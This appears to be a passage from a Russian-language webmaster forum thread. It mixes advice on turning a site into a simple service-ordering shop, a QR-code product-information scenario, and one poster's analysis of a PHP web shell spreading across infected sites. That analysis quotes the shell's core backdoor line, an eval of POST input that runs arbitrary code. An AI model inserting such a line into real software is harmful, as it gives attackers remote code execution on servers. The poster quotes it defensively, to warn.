С ходу сложно понять, что там за сайт такой, но похоже, его просто надо переделать. Сделать что-то типа простенького интернет-магазина, но вместо товара - услуга, там же цена, а вместо кнопки "купить" - кнопка "заказать".
Лично я вижу "это" в мета-теге "description" на соответствующей странице. Настраивайте сайт, и будет Вам счастье.
Или уменьшить. Или nginx поставить. В общем, что-то делать надо:
/ru/forum/634388
Оффтоп. Не из той оперы.
Сайт нужен не для того, чтобы читать инфу с QR-кода, а если не хватит тех полутора тысяч знаков, что можно зашить в код. Например, нужно показать подробные чертежи того мотоцикла, что стоит перед покупателем со смартфоном, разглядывающим QR-код. В этом случае передо мной вырисовывается примерно такая картина:
1. Создаётся информационный сайт, на котором размещено подробное описание каждого товара.
2. В магазин завозится товар.
3. Изготавливаются ярлычки с QR-кодом, в который записывается информация о товаре и ссылка на страницу сайта, относящуюся к этому товару.
4. Покупатель направляет свой девайс на ярлычок и читает высветившуюся информацию.
5. Если покупателя интересует более подробная инфа, то он идёт на сайт по ссылке, указанной на ярлычке.
6. Полностью проинформированный и довольный покупатель покупает товар и идёт домой, чтобы просмотреть весь сайт в более комфортных условиях.
7. На следующий день покупатель возвращается в магазин и тратит там оставшиеся деньги.
Ну вот для этого уж точно никакой сайт не нужен. Нужно, чтобы в телефоне было приложение для считывания QR кода. Ссылка на соответствующую страницу сайта может быть зашита в коде в качестве дополнительной информации, но это уже если очень много информации требуется.
Что касается шелла, с которого и началась эта тема, то по моим наблюдениям, для его заливки используется одна и та же уязвимость. Заражено уже очень много сайтов, и процесс продолжается. Пока идёт только тихая подготовка: код заливается и делается проверка работоспособности. Зачем - остаётся только гадать. Не исключено, что в один прекрасный день на всех сайтах одновременно вместо главной страницы появится "красивая" афиша. Или просто снесут весь аккаунт нафиг. Сервер, с которого идут атаки, расположен в Харькове. С учётом непростой международной обстановки можно нафантазировать чего угодно.
Да нет там никакого интерфейса. Просто выполняет, то что поступает по командам GET и POST. По сессиям там заложена возможность записывать в сессии всё, что в голову взбредёт. Но повторюсь, программа явно недоделана, производит впечатление полуфабриката. Основное, чего там следует бояться:
if( $page == 'cmd' ) { @eval(@$_POST['cmd']); }
Выполняет произвольный код.
В общем, это шелл. Умеет работать с сессиями, исполнять передаваемый произвольный код и обновляться. Написан, правда, с ошибками, поэтому, возможно, частично или полностью нерабочий. А может быть, и рабочий, если ошибки нефатальные - не вникал. В любом случае это дыра.
Мне почему-то казалось, что сайты делают для некоторой "аудитории" - открытой или закрытой. А этот проект в сайте как таковом не нуждается, ИМХО. Покупаете статический IP и работаете с удаленным компьютером.
